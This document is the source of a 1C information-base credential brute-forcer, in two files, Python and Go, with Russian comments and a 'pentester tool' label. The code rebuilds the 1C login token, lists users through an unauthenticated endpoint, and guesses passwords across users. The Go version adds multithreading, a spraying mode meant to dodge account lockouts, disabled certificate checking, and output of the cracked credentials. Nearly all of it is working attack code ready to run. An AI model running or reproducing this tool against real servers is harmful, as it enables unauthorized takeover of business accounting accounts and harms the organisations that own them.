File: 1c_bruter.py
import base64
import hashlib
import zlib
import struct
import requests
import re
import argparse
import os
import logging
import sys
import secrets
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# Настройка логирования
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")

# Фиксированный IV для AES (используется для совместимости с 1С; для критичных применений используйте случайный IV)
FIXED_IV = bytes([157, 123, 154, 32, 105, 101, 187, 40, 6, 122, 72, 61, 178, 108, 113, 142])

# Переопределение обработчика исключений для корректного завершения работы при Ctrl+C
_original_excepthook = sys.excepthook
def custom_excepthook(exctype, value, traceback):
    if exctype == KeyboardInterrupt:
        logging.info("Выход...")
    else:
        _original_excepthook(exctype, value, traceback)
sys.excepthook = custom_excepthook

def sha1_base64(input_str: str) -> bytes:
    """
    Возвращает base64-кодированный SHA1-хеш от входной строки.
    """
    sha1_digest = hashlib.sha1(input_str.encode()).digest()
    return base64.b64encode(sha1_digest)

def sha256_digest(data: bytes) -> bytes:
    """
    Возвращает SHA256-хеш от входных данных.
    """
    return hashlib.sha256(data).digest()

def generate_auth_token(password: str, username: str) -> str:
    """
    Генерирует токен аутентификации.

    Алгоритм:
      1. Генерируется первый блок: 32 байта случайных данных шифруются AES-CBC с ключом, 
         полученным как sha256(sha1_base64(password)).
      2. Генерируется второй блок: ещё 32 байта случайных данных шифруются AES-CBC с ключом, 
         полученным как sha256(sha1_base64(password.upper())).
      3. Добавляется имя пользователя с указанием его длины (4 байта, little-endian).
      4. Вычисляется CRC32 для сформированного набора байт и добавляется (4 байта, little-endian).
      5. Итоговый набор байт кодируется в base64 и возвращается.
    """
    token_bytes = bytearray()
    
    # Версия/идентификатор токена
    token_bytes.append(1)
    
    # Первый блок шифрования
    random_block1 = secrets.token_bytes(32)
    key1 = sha256_digest(sha1_base64(password))
    cipher1 = AES.new(key1, AES.MODE_CBC, iv=FIXED_IV)
    encrypted_block1 = cipher1.encrypt(pad(random_block1, AES.block_size))
    token_bytes.append(len(encrypted_block1))
    token_bytes.extend(encrypted_block1)
    
    # Второй блок шифрования
    random_block2 = secrets.token_bytes(32)
    key2 = sha256_digest(sha1_base64(password.upper()))
    cipher2 = AES.new(key2, AES.MODE_CBC, iv=FIXED_IV)
    encrypted_block2 = cipher2.encrypt(pad(random_block2, AES.block_size))
    token_bytes.append(len(encrypted_block2))
    token_bytes.extend(encrypted_block2)
    
    # Добавление имени пользователя: сначала 4 байта длины, затем само имя
    username_bytes = username.encode()
    token_bytes.extend(struct.pack("<I", len(username_bytes)))
    token_bytes.extend(username_bytes)
    
    # Вычисление и добавление контрольной суммы CRC32 (4 байта, little-endian)
    checksum = zlib.crc32(token_bytes)
    token_bytes.extend(struct.pack("<I", checksum))
    
    return base64.b64encode(token_bytes).decode()

def get_version(url: str) -> str:
    """
    Получает версию 1С информационной базы по указанному URL.
    """
    try:
        response = requests.get(f"{url}/")
        response.raise_for_status()
    except Exception as e:
        logging.error(f"Ошибка при получении версии: {e}")
        return ""
    
    match = re.search(r'(?<=var VERSION = ")[0-9\.]+', response.text)
    if match:
        return match.group(0)
    else:
        logging.error("Не удалось определить версию из ответа сервера.")
        return ""

def authenticate(url: str, version: str, credentials: str) -> bool:
    """
    Пытается аутентифицироваться на сервере, используя переданный токен.
    """
    data = {"cred": credentials}
    try:
        response = requests.post(f"{url}/e1cib/login?version={version}", json=data)
        return response.status_code == 200
    except Exception as e:
        logging.error(f"Ошибка при аутентификации: {e}")
        return False

def fetch_users(url: str) -> list:
    """
    Получает список пользователей из информационной базы.
    """
    try:
        response = requests.get(f"{url}/e1cib/users")
        response.raise_for_status()
    except Exception as e:
        logging.error(f"Не удалось получить список пользователей: {e}")
        return []
    return [user.strip() for user in response.text.split("\r\n") if user.strip()]

def check_credentials(username: str, password: str, url: str, version: str) -> bool:
    """
    Проверяет, действительны ли переданные имя пользователя и пароль.
    """
    token = generate_auth_token(password, username)
    return authenticate(url, version, token)

def load_users(args, url: str) -> list:
    """
    Загружает пользователей из аргументов командной строки, файла или через запрос к серверу.
    """
    users = []
    if args.user:
        users.append(args.user)
    if args.users:
        if os.path.exists(args.users):
            with open(args.users, encoding="utf-8") as f:
                file_users = [line.strip() for line in f if line.strip()]
                users.extend(file_users)
        else:
            logging.warning(f"Файл с пользователями {args.users} не существует!")
    if args.get:
        fetched_users = fetch_users(url)
        if fetched_users:
            users.extend(fetched_users)
    users = list(set(users))
    users.sort()
    return users

def load_passwords(args) -> list:
    """
    Загружает пароли из аргументов командной строки или файла.
    """
    passwords = []
    if args.password:
        passwords.append(args.password)
    if args.passwords:
        if os.path.exists(args.passwords):
            with open(args.passwords, encoding="utf-8") as f:
                file_passwords = [line.strip() for line in f if line.strip()]
                passwords.extend(file_passwords)
        else:
            logging.warning(f"Файл с паролями {args.passwords} не существует!")
    return passwords

def main():
    parser = argparse.ArgumentParser(
        description="Пентестерский инструмент для перебора учетных данных 1С информационной базы."
    )
    parser.add_argument("url", help="URL 1С информационной базы")
    parser.add_argument("-u", dest="user", help="Имя пользователя для проверки пароля")
    parser.add_argument("-U", dest="users", help="Файл со списком пользователей")
    parser.add_argument("-p", dest="password", help="Пароль для перебора")
    parser.add_argument("-P", dest="passwords", help="Файл со списком паролей")
    parser.add_argument("-l", dest="get", action="store_true", default=False,
                        help="Получить список пользователей из информационной базы")
    parser.add_argument("-o", dest="output", help="Файл для сохранения результатов")
    args = parser.parse_args()
    
    if not args.url or not args.url.startswith("http"):
        logging.critical(f"{args.url} не является корректным URL!")
        sys.exit(1)
    
    version = get_version(args.url)
    if not version:
        logging.error(f"Не удалось определить версию! URL: {args.url}")
        sys.exit(1)
    logging.info(f"Версия: {version}")
    
    users = load_users(args, args.url)
    if not users:
        logging.critical("Пользователи не загружены!")
        sys.exit(1)
    
    passwords = load_passwords(args)
    if not passwords:
        logging.critical("Пароли не загружены!")
        sys.exit(1)
    
    # Перебор комбинаций пользователей и паролей
    for password in passwords:
        for username in users:
            if check_credentials(username, password, args.url, version):
                logging.info(f"[+] Успешная аутентификация! Пользователь: {username}, Пароль: {password}")

if __name__ == "__main__":
    main()

File: 1c_bruter.go
package main

import (
	"bufio"
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"crypto/sha256"
	"crypto/tls"
	"encoding/base64"
	"encoding/binary"
	"encoding/json"
	"flag"
	"fmt"
	"hash/crc32"
	"io"
	"log"
	"net/http"
	"os"
	"os/signal"
	"regexp"
	"sort"
	"strings"
	"sync"
	"sync/atomic"
	"syscall"
	"time"
	"unicode"
)

// FIXED_IV используется для AES-CBC (для совместимости с 1С)
var FIXED_IV = []byte{157, 123, 154, 32, 105, 101, 187, 40, 6, 122, 72, 61, 178, 108, 113, 142}

type job struct {
	username string
	password string
}

// httpClient с поддержкой TLS 1.0+ и самоподписанных корпоративных сертификатов
var httpClient = &http.Client{
	Transport: &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: true, //nolint: корпоративные серверы 1С используют самоподписанные сертификаты
			MinVersion:         tls.VersionTLS10,
		},
	},
}

// pad выполняет PKCS#7 padding.
func pad(data []byte, blockSize int) []byte {
	padding := blockSize - len(data)%blockSize
	padText := bytes.Repeat([]byte{byte(padding)}, padding)
	return append(data, padText...)
}

// generateAuthToken создаёт токен аутентификации 1С.
func generateAuthToken(password, username string) (string, error) {
	token := []byte{0x01}

	randomBlock1 := make([]byte, 32)
	if _, err := rand.Read(randomBlock1); err != nil {
		return "", err
	}
	h1 := sha1.Sum([]byte(password))
	key1 := sha256.Sum256([]byte(base64.StdEncoding.EncodeToString(h1[:])))
	block1, err := aes.NewCipher(key1[:])
	if err != nil {
		return "", err
	}
	enc1 := make([]byte, len(pad(randomBlock1, aes.BlockSize)))
	cipher.NewCBCEncrypter(block1, FIXED_IV).CryptBlocks(enc1, pad(randomBlock1, aes.BlockSize))
	token = append(token, byte(len(enc1)))
	token = append(token, enc1...)

	randomBlock2 := make([]byte, 32)
	if _, err := rand.Read(randomBlock2); err != nil {
		return "", err
	}
	h2 := sha1.Sum([]byte(strings.ToUpper(password)))
	key2 := sha256.Sum256([]byte(base64.StdEncoding.EncodeToString(h2[:])))
	block2, err := aes.NewCipher(key2[:])
	if err != nil {
		return "", err
	}
	enc2 := make([]byte, len(pad(randomBlock2, aes.BlockSize)))
	cipher.NewCBCEncrypter(block2, FIXED_IV).CryptBlocks(enc2, pad(randomBlock2, aes.BlockSize))
	token = append(token, byte(len(enc2)))
	token = append(token, enc2...)

	usernameBytes := []byte(username)
	lenBuf := make([]byte, 4)
	binary.LittleEndian.PutUint32(lenBuf, uint32(len(usernameBytes)))
	token = append(token, lenBuf...)
	token = append(token, usernameBytes...)

	checksum := crc32.ChecksumIEEE(token)
	binary.LittleEndian.PutUint32(lenBuf, checksum)
	token = append(token, lenBuf...)

	return base64.StdEncoding.EncodeToString(token), nil
}

// getVersion получает версию информационной базы.
func getVersion(baseURL string) (string, error) {
	resp, err := httpClient.Get(baseURL + "/")
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return "", err
	}
	re := regexp.MustCompile(`var VERSION = "([0-9.]+)"`)
	if m := re.FindSubmatch(body); len(m) >= 2 {
		return string(m[1]), nil
	}
	return "", fmt.Errorf("версия не найдена в ответе сервера")
}

// authenticate отправляет токен на сервер и возвращает результат.
func authenticate(baseURL, version, credentials string) (bool, error) {
	data, _ := json.Marshal(map[string]string{"cred": credentials})
	resp, err := httpClient.Post(
		fmt.Sprintf("%s/e1cib/login?version=%s", baseURL, version),
		"application/json",
		bytes.NewReader(data),
	)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	return resp.StatusCode == 200, nil
}

// fetchUsers получает список пользователей информационной базы.
func fetchUsers(baseURL string) ([]string, error) {
	resp, err := httpClient.Get(baseURL + "/e1cib/users")
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}
	var users []string
	for _, u := range strings.Split(string(body), "\r\n") {
		if u = strings.TrimSpace(u); u != "" {
			users = append(users, u)
		}
	}
	return users, nil
}

// checkCredentials генерирует токен и проверяет учетные данные.
func checkCredentials(baseURL, version, username, password string) bool {
	token, err := generateAuthToken(password, username)
	if err != nil {
		return false
	}
	ok, err := authenticate(baseURL, version, token)
	if err != nil {
		return false
	}
	return ok
}

// decodeUTF16LE декодирует байты UTF-16 LE в строку.
func decodeUTF16LE(b []byte) string {
	if len(b)%2 != 0 {
		b = b[:len(b)-1]
	}
	runes := make([]rune, len(b)/2)
	for i := range runes {
		runes[i] = rune(b[2*i]) | rune(b[2*i+1])<<8
	}
	return string(runes)
}

// decodeUTF16BE декодирует байты UTF-16 BE в строку.
func decodeUTF16BE(b []byte) string {
	if len(b)%2 != 0 {
		b = b[:len(b)-1]
	}
	runes := make([]rune, len(b)/2)
	for i := range runes {
		runes[i] = rune(b[2*i])<<8 | rune(b[2*i+1])
	}
	return string(runes)
}

// looksLikeUTF16LE проверяет, похож ли файл на UTF-16 LE без BOM.
// В UTF-16 LE нечётные байты (старший байт пары) для кириллицы = 0x04, для ASCII = 0x00.
func looksLikeUTF16LE(data []byte) bool {
	if len(data) < 8 || len(data)%2 != 0 {
		return false
	}
	check := len(data)
	if check > 200 {
		check = 200
	}
	matches := 0
	for i := 1; i < check; i += 2 {
		if data[i] == 0x00 || data[i] == 0x04 {
			matches++
		}
	}
	return matches*2 > check
}

// decodeTextBytes определяет кодировку по BOM (или эвристике) и возвращает текст в UTF-8.
func decodeTextBytes(data []byte) string {
	switch {
	case bytes.HasPrefix(data, []byte{0xEF, 0xBB, 0xBF}):
		return string(data[3:]) // UTF-8 BOM
	case bytes.HasPrefix(data, []byte{0xFF, 0xFE}):
		return decodeUTF16LE(data[2:]) // UTF-16 LE
	case bytes.HasPrefix(data, []byte{0xFE, 0xFF}):
		return decodeUTF16BE(data[2:]) // UTF-16 BE
	default:
		if looksLikeUTF16LE(data) {
			return decodeUTF16LE(data) // UTF-16 LE без BOM
		}
		return string(data)
	}
}

// parseLines разбивает текст на непустые очищенные строки.
func parseLines(text string) []string {
	text = strings.ReplaceAll(text, "\r\n", "\n")
	text = strings.ReplaceAll(text, "\r", "\n")
	var result []string
	for _, line := range strings.Split(text, "\n") {
		line = strings.Map(func(r rune) rune {
			if unicode.IsControl(r) || !unicode.IsPrint(r) {
				return -1
			}
			return r
		}, line)
		line = strings.TrimSpace(line)
		if line != "" {
			result = append(result, line)
		}
	}
	return result
}

// loadLinesFromFile загружает строки из файла с поддержкой UTF-8, UTF-8 BOM, UTF-16 LE/BE.
func loadLinesFromFile(filename string) ([]string, error) {
	data, err := os.ReadFile(filename)
	if err != nil {
		return nil, err
	}
	return parseLines(decodeTextBytes(data)), nil
}

// countFileLines считает строки используя ту же логику что loadLinesFromFile.
// Для UTF-8 без BOM использует стриминг (экономия памяти для больших файлов паролей).
func countFileLines(filename string) int {
	f, err := os.Open(filename)
	if err != nil {
		log.Printf("Не удалось открыть файл %s: %v", filename, err)
		return 0
	}
	defer f.Close()

	// Читаем начало для определения кодировки
	header := make([]byte, 200)
	n, _ := f.Read(header)
	header = header[:n]

	// Любая специальная кодировка — грузим полностью через loadLinesFromFile
	needsFull := bytes.HasPrefix(header, []byte{0xEF, 0xBB, 0xBF}) ||
		bytes.HasPrefix(header, []byte{0xFF, 0xFE}) ||
		bytes.HasPrefix(header, []byte{0xFE, 0xFF}) ||
		looksLikeUTF16LE(header)
	if needsFull {
		f.Close()
		lines, err := loadLinesFromFile(filename)
		if err != nil {
			return 0
		}
		return len(lines)
	}

	// UTF-8 plain: стримим с той же фильтрацией что parseLines
	if _, err := f.Seek(0, io.SeekStart); err != nil {
		return 0
	}
	scanner := bufio.NewScanner(f)
	count := 0
	for scanner.Scan() {
		line := strings.Map(func(r rune) rune {
			if unicode.IsControl(r) || !unicode.IsPrint(r) {
				return -1
			}
			return r
		}, scanner.Text())
		if strings.TrimSpace(line) != "" {
			count++
		}
	}
	return count
}

// feedPasswordsFromFile читает файл паролей построчно и отправляет задачи в канал.
// UTF-8 файлы читаются потоком без загрузки в память; UTF-16 загружаются полностью.
func feedPasswordsFromFile(filename string, users []string, jobs chan<- job) error {
	f, err := os.Open(filename)
	if err != nil {
		return err
	}
	defer f.Close()

	header := make([]byte, 200)
	n, _ := f.Read(header)
	header = header[:n]

	needsFull := bytes.HasPrefix(header, []byte{0xEF, 0xBB, 0xBF}) ||
		bytes.HasPrefix(header, []byte{0xFF, 0xFE}) ||
		bytes.HasPrefix(header, []byte{0xFE, 0xFF}) ||
		looksLikeUTF16LE(header)
	if needsFull {
		f.Close()
		lines, err := loadLinesFromFile(filename)
		if err != nil {
			return err
		}
		for _, password := range lines {
			for _, username := range users {
				jobs <- job{username, password}
			}
		}
		return nil
	}

	if _, err := f.Seek(0, io.SeekStart); err != nil {
		return err
	}
	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		password := strings.Map(func(r rune) rune {
			if unicode.IsControl(r) || !unicode.IsPrint(r) {
				return -1
			}
			return r
		}, scanner.Text())
		password = strings.TrimSpace(password)
		if password == "" {
			continue
		}
		for _, username := range users {
			jobs <- job{username, password}
		}
	}
	return scanner.Err()
}

// uniqueStrings убирает дубликаты, сохраняя порядок.
func uniqueStrings(input []string) []string {
	seen := make(map[string]bool)
	var result []string
	for _, s := range input {
		if !seen[s] {
			seen[s] = true
			result = append(result, s)
		}
	}
	return result
}

// uniqueStringsSorted убирает дубликаты и сортирует строки.
func uniqueStringsSorted(input []string) []string {
	result := uniqueStrings(input)
	sort.Strings(result)
	return result
}

// makeProgressBar возвращает ASCII прогресс-бар.
func makeProgressBar(done, total int64, width int) string {
	if total == 0 {
		return "[" + strings.Repeat("-", width) + "]"
	}
	filled := int(float64(done) / float64(total) * float64(width))
	if filled > width {
		filled = width
	}
	bar := strings.Repeat("=", filled)
	if filled < width {
		bar += ">"
		bar += strings.Repeat(" ", width-filled-1)
	}
	return "[" + bar + "]"
}

// formatETA форматирует оставшееся время.
func formatETA(d time.Duration) string {
	d = d.Round(time.Second)
	if d <= 0 {
		return "0s"
	}
	h := int(d.Hours())
	m := int(d.Minutes()) % 60
	s := int(d.Seconds()) % 60
	if h > 0 {
		return fmt.Sprintf("%dh%02dm%02ds", h, m, s)
	}
	if m > 0 {
		return fmt.Sprintf("%dm%02ds", m, s)
	}
	return fmt.Sprintf("%ds", s)
}

func main() {
	// Извлекаем URL из аргументов ДО flag.Parse() — это позволяет флагам стоять в любом месте,
	// до или после URL (Go's flag.Parse останавливается на первом non-flag аргументе).
	var baseURL string
	filtered := []string{os.Args[0]}
	for _, arg := range os.Args[1:] {
		if (strings.HasPrefix(arg, "http://") || strings.HasPrefix(arg, "https://")) && baseURL == "" {
			baseURL = arg
		} else {
			filtered = append(filtered, arg)
		}
	}
	os.Args = filtered

	userFlag := flag.String("u", "", "Имя пользователя для проверки пароля")
	usersFileFlag := flag.String("U", "", "Файл со списком пользователей")
	passwordFlag := flag.String("p", "", "Пароль для перебора")
	passwordFlagSet := false
	passwordsFileFlag := flag.String("P", "", "Файл со списком паролей")
	getUsersFlag := flag.Bool("l", false, "Получить список пользователей из информационной базы")
	verboseFlag := flag.Bool("v", false, "Выводить все попытки, включая неудачные")
	threadsFlag := flag.Int("t", 1, "Количество параллельных потоков")
	outputFlag := flag.String("o", "", "Файл для сохранения результатов")
	flag.Parse()
	flag.Visit(func(f *flag.Flag) {
		if f.Name == "p" {
			passwordFlagSet = true
		}
	})

	// Если URL не нашли в args (не начинается с http), проверяем остаток от flag.Parse
	if baseURL == "" {
		if args := flag.Args(); len(args) > 0 {
			baseURL = args[0]
		}
	}
	if baseURL == "" {
		log.Fatal("URL не указан!\nИспользование: wb1c [флаги] <URL>\n  Флаги можно указывать до или после URL.")
	}
	if !strings.HasPrefix(baseURL, "http") {
		log.Fatalf("Некорректный URL: %s", baseURL)
	}

	version, err := getVersion(baseURL)
	if err != nil || version == "" {
		log.Fatalf("Не удалось определить версию! URL: %s, ошибка: %v", baseURL, err)
	}

	// Режим только получения списка пользователей
	if *getUsersFlag && *userFlag == "" && *usersFileFlag == "" && !passwordFlagSet && *passwordsFileFlag == "" {
		users, err := fetchUsers(baseURL)
		if err != nil {
			log.Fatalf("Не удалось получить список пользователей: %v", err)
		}
		if len(users) == 0 {
			log.Fatal("Не удалось получить список пользователей!")
		}
		log.Printf("Найдено пользователей: %d", len(users))
		for _, user := range users {
			fmt.Println(user)
		}
		if *outputFlag != "" {
			if err := os.WriteFile(*outputFlag, []byte(strings.Join(users, "\n")), 0644); err != nil {
				log.Printf("Ошибка сохранения: %v", err)
			} else {
				log.Printf("Список сохранён в %s", *outputFlag)
			}
		}
		os.Exit(0)
	}

	// Загружаем пользователей
	var users []string
	if *userFlag != "" {
		users = append(users, *userFlag)
	}
	if *usersFileFlag != "" {
		lines, err := loadLinesFromFile(*usersFileFlag)
		if err != nil {
			log.Printf("Ошибка чтения файла с пользователями (%s): %v", *usersFileFlag, err)
		} else if len(lines) == 0 {
			log.Printf("Предупреждение: файл пользователей пустой или кодировка не распознана: %s", *usersFileFlag)
		} else {
			users = append(users, lines...)
		}
	}
	if *getUsersFlag {
		fetched, err := fetchUsers(baseURL)
		if err != nil {
			log.Printf("Ошибка получения пользователей с сервера: %v", err)
		} else {
			users = append(users, fetched...)
		}
	}
	users = uniqueStringsSorted(users)
	if len(users) == 0 {
		log.Fatal("Пользователи не загружены!")
	}

	// Подсчёт паролей
	var inlinePws []string
	if passwordFlagSet {
		inlinePws = []string{*passwordFlag}
	}
	pwFileCount := 0
	if *passwordsFileFlag != "" {
		pwFileCount = countFileLines(*passwordsFileFlag)
		if pwFileCount == 0 {
			log.Printf("Предупреждение: файл паролей пустой или недоступен: %s", *passwordsFileFlag)
		}
	}
	pwTotal := len(inlinePws) + pwFileCount
	if pwTotal == 0 {
		log.Fatal("Пароли не загружены!")
	}

	// Спрей-режим: много пользователей, мало паролей — перебираем один пароль по всем.
	// Порядок: for password → for user (защита от блокировок аккаунтов).
	// Брут-режим: несколько пользователей, много паролей — перебираем все пароли на каждого.
	sprayMode := len(users) > pwTotal

	var sprayPws []string
	if sprayMode {
		sprayPws = append(sprayPws, inlinePws...)
		if *passwordsFileFlag != "" {
			lines, err := loadLinesFromFile(*passwordsFileFlag)
			if err != nil {
				log.Printf("Ошибка чтения файла паролей: %v", err)
			} else {
				sprayPws = append(sprayPws, lines...)
			}
		}
		sprayPws = uniqueStrings(sprayPws)
		pwTotal = len(sprayPws)
	}

	// Ctrl+C
	sigChan := make(chan os.Signal, 1)
	signal.Notify(sigChan, os.Interrupt, syscall.SIGTERM)
	go func() {
		<-sigChan
		fmt.Fprintln(os.Stderr, "\nПрервано.")
		os.Exit(0)
	}()

	total := int64(len(users)) * int64(pwTotal)
	workers := *threadsFlag
	if workers < 1 {
		workers = 1
	}

	// Шапка
	fmt.Fprintln(os.Stderr)
	fmt.Fprintf(os.Stderr, "  Цель:    %s  (v%s)\n", baseURL, version)
	if sprayMode {
		fmt.Fprintf(os.Stderr, "  Режим:   спрей  |  пользователей: %d  |  паролей: %d  |  попыток: %d\n",
			len(users), pwTotal, total)
	} else {
		fmt.Fprintf(os.Stderr, "  Режим:   брут   |  пользователей: %d  |  паролей: %d  |  попыток: %d\n",
			len(users), pwTotal, total)
	}
	fmt.Fprintf(os.Stderr, "  Потоков: %d\n\n", workers)

	jobs := make(chan job, workers*4)
	var wg sync.WaitGroup
	var mu sync.Mutex
	var tried int64
	var results []string

	start := time.Now()

	// Прогресс-бар (отключается в verbose-режиме)
	progressDone := make(chan struct{})
	var progressWg sync.WaitGroup
	if !*verboseFlag {
		progressWg.Add(1)
		go func() {
			defer progressWg.Done()
			ticker := time.NewTicker(200 * time.Millisecond)
			defer ticker.Stop()
			for {
				select {
				case <-ticker.C:
					n := atomic.LoadInt64(&tried)
					elapsed := time.Since(start).Seconds()
					speed := 0.0
					if elapsed > 0.5 {
						speed = float64(n) / elapsed
					}
					eta := "?"
					if speed > 0 && total > n {
						eta = formatETA(time.Duration(float64(total-n) / speed * float64(time.Second)))
					}
					pct := float64(n) * 100 / float64(total)
					bar := makeProgressBar(n, total, 30)
					line := fmt.Sprintf("  %s  %d/%d  %.1f%%  %.0f/s  ETA %s",
						bar, n, total, pct, speed, eta)
					mu.Lock()
					fmt.Fprintf(os.Stderr, "\r%-80s", line)
					mu.Unlock()
				case <-progressDone:
					return
				}
			}
		}()
	}

	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for j := range jobs {
				n := atomic.AddInt64(&tried, 1)
				if *verboseFlag {
					log.Printf("[%d/%d] %s:%s", n, total, j.username, j.password)
				}
				if checkCredentials(baseURL, version, j.username, j.password) {
					mu.Lock()
					results = append(results, fmt.Sprintf("%s:%s", j.username, j.password))
					if !*verboseFlag {
						fmt.Fprintf(os.Stderr, "\r%-80s\r", "")
					}
					fmt.Printf("[+] %s : %s\n", j.username, j.password)
					mu.Unlock()
				} else if *verboseFlag {
					log.Printf("[-] %s:%s", j.username, j.password)
				}
			}
		}()
	}

	if sprayMode {
		// Спрей: for password → for user (один пароль на всех, потом следующий)
		for _, pass := range sprayPws {
			for _, user := range users {
				jobs <- job{user, pass}
			}
		}
	} else {
		// Брут: for user → for password, пароли стримятся из файла
		for _, pass := range inlinePws {
			for _, user := range users {
				jobs <- job{user, pass}
			}
		}
		if *passwordsFileFlag != "" {
			if err := feedPasswordsFromFile(*passwordsFileFlag, users, jobs); err != nil {
				log.Printf("Ошибка чтения файла паролей: %v", err)
			}
		}
	}
	close(jobs)
	wg.Wait()

	close(progressDone)
	progressWg.Wait()
	elapsed := time.Since(start).Round(time.Second)
	fmt.Fprintf(os.Stderr, "\r%-80s\r\n", "")
	fmt.Fprintf(os.Stderr, "  Завершено  |  проверено: %d  |  найдено: %d  |  время: %s\n\n",
		tried, len(results), elapsed)

	if *outputFlag != "" && len(results) > 0 {
		if err := os.WriteFile(*outputFlag, []byte(strings.Join(results, "\n")), 0644); err != nil {
			log.Printf("Ошибка сохранения: %v", err)
		} else {
			log.Printf("Результаты сохранены в %s", *outputFlag)
		}
	}
}
